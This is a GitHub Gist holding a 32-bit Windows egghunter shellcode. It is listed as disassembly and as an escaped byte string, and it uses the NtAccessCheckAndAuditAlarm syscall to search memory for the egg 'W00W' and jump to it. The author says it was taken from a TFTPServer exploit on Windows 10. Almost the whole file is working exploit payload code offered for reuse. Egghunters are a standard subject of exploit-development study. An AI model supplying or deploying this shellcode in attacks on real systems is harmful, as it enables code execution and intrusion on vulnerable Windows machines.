Last active
April 5, 2024 19:34
-
-
Save habibiefaried/c7b5fc9954c073f4f098dad199a96f9a to your computer and use it in GitHub Desktop.
This is egghunter that using NtAccessCheckAndAuditAlarm to check NT_ACCESS_VIOLATION. The system call is different in Windows 8 and 10. I make slight modification on this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;; These memory maps I take to create TFTPServer exploit on Windows 10 | |
| 0062FF72 66:81CA FF0F OR DX,0FFF | |
| 0062FF77 42 INC EDX | |
| 0062FF78 52 PUSH EDX | |
| 0062FF79 33C0 XOR EAX,EAX | |
| 0062FF7B 66:B8 C601 MOV AX,1C6 | |
| 0062FF7F CD 2E INT 2E | |
| 0062FF81 3C 05 CMP AL,5 | |
| 0062FF83 5A POP EDX | |
| 0062FF84 ^74 EC JE SHORT 0062FF72 | |
| 0062FF86 B8 57303057 MOV EAX,57303057 | |
| 0062FF8B 8BFA MOV EDI,EDX | |
| 0062FF8D AF SCAS DWORD PTR ES:[EDI] | |
| 0062FF8E ^75 E7 JNZ SHORT 0062FF77 | |
| 0062FF90 AF SCAS DWORD PTR ES:[EDI] | |
| 0062FF91 ^75 E4 JNZ SHORT 0062FF77 | |
| 0062FF93 FFE7 JMP EDI | |
| ;; NT Syscall table http://j00ru.vexillium.org/syscalls/nt/32/ | |
| ;; Shellcode: EGGHUNTER = ( | |
| ;; "\x66\x81\xCA\xFF\x0F\x42\x52\x33\xC0\x66\xB8" | |
| ;; "\xC6\x01" ##NtAccessCheckAndAuditAlarm in reversed order | |
| ;; "\xCD\x2E\x3C\x05\x5A\x74\xEC\xB8" | |
| ;; "W00W" ##EGG STRING | |
| ;; "\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment